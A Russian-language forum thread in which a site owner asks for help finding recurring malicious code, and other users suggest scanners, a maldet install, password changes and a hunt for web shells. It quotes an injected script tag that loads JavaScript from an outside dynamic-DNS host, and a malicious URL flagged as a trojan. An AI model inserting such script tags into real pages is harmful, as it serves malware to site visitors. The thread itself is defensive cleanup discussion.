Как найти вредоносный код в сайте???

Здравствуйте ув. форумчане. В 10й раз вынужден просить Вашей помощи. Никак не могу справиться с вирусами у себя на сайте. Сайт www.monti-sib.ru
Начнем по порядку:
Около 1,5 месяцев назад была проблема с вредоносным кодом (base64_decode. Разобрался, удалил. Вроде все стало хорошо, даже индексировать вновь яндекс начал. Но, буквально через недели 2 появился новый ко. Сначала не мог понять что за код, потом с помощью тех. поддержки Яндекса все таки выяснил что код вида:
</html>
}

<script src="http://feelthesame.changeip.name/rsize.js"></script>

Нашел, удалил. Залил обратно на сервер... первое время все было хорошо, НО теперь Яндекс вообще не пускает на сайт, пишет что сайт вредоносный. Якобы 2 страницы с таким кодом: главная и раздел крио оборудование. Вроде код удалил весь! через Notepad++ проверяю - нет его. Тех поддержка пишет, что есть! Однако, когда захожу на сайт, даже у меня антивирус ругается, пишет следующее:

http://fdlfvbh.ddns.name:1964/techno...tend-thats.php
JS/Kryptik.AGF троянская программа

Забиваю это в Нотпал - нет его! Проверил антивирусом скопированный на лок. диск сайт - нашел только, что файл JQuery.zip поврежден.

Что делать? Где искать код вредоносный? Спасибо заранее

Мне один сайтег взломали 3 раза за месяц после чего я снял права на запись для всех пользователей. Теперь тишина уже 2 месяца без происшествий.

http://antivirus-alarm.ru/proverka/?...w.monti-sib.ru
ознакомьтесь
только три авера пока ругаются и лочат сайт
если было все хорошо, то попробуйте из бекапа восстановить или в тп написать чтобы из своих восстановили.

дело в том, что все мои бекапы, как выяснились уже с кодом! а тп говорит, что все бекапы хранит 7 дней. поэтому тут тоже не вариант

слить себе папочку с сайтом и просканить ее.
хотите я своим авером посмотрю ?

было бы здорово) напишите аську, скайп... что-нибудь для связи

айболитом посмотри

http://revisium.com/ai/

пиши в тех.поддержку хостинга пусть помогают

Кстати отличный способ! Я таким образом нашел вирус на сайте. Авирой

2ip.ru - принцип работы в этом сервисе обычный: прописываем адрес сайта который нужно проверить на наличие вредоносного кода и нажимаем кнопку «Проверить». После проверки вам выдаётся сообщение, были ли обнаружены на сайте вирусы или подозрительные коды. Этот сервис также проверяет, считают ли поисковики Яндекс и Google этот сайт зараженным. Но не всё так просто.

Если немного знакомы с администрированием, то советую использовать maldet, как вариант попросите своего хостера установить и проверить ваши данные.

cd /usr/local/src/
wget rfxn.com/downloads/maldetect-current.tar.gz
tar -xzf maldetect-current.tar.gz
cd maldetect-*
sh ./install.sh
maldet --update-ver
maldet --update

Запустить сканирование, например директории /home, можно так maldet -a /home

У меня когда вирус был на сайте. Он прописался в каждом, абсолютно в каждом файле внизу.
Все JS коды, все html, php, даже в css.
Код еще сложно найти потом что он зашифрован.

Просмотрите все файлы. Именно конец этих файлов. Конец, потому что если они поставят его выше, то может сайт сломаться, а им этого не нужно, им нужно что бы все работало хорошо и не вызывало подозрений.

Hohol36g, на чем стоит сайт? Самописная цмс?
я бы на вашем месте в первую очередь задумался бы, как туда вирус то попал) Не первый же раз... Может шел залит?
а почему в конце страниц сайта стоит }?
Это нормально что чпу в виде index.php/page?

какае нафиг антивирусы, люди не смешите, ТС, во первых смени везде пароли, в третих попроси хостера дать лог ошибок чтобы посмотреть через чо ломали твой сайт ,в третих найди шелл среди файлов и почисти файли от бекдоров, иначе будешь всю жизнь с подобной заразой мучаться

Два варианта скачать сайт пройтись антивирусом,
Второй вариант установить айболит http://revisium.com/ai/
Третий в вебмастере google посмотреть вкладку вредоносное ПО - они обычно указывают что где.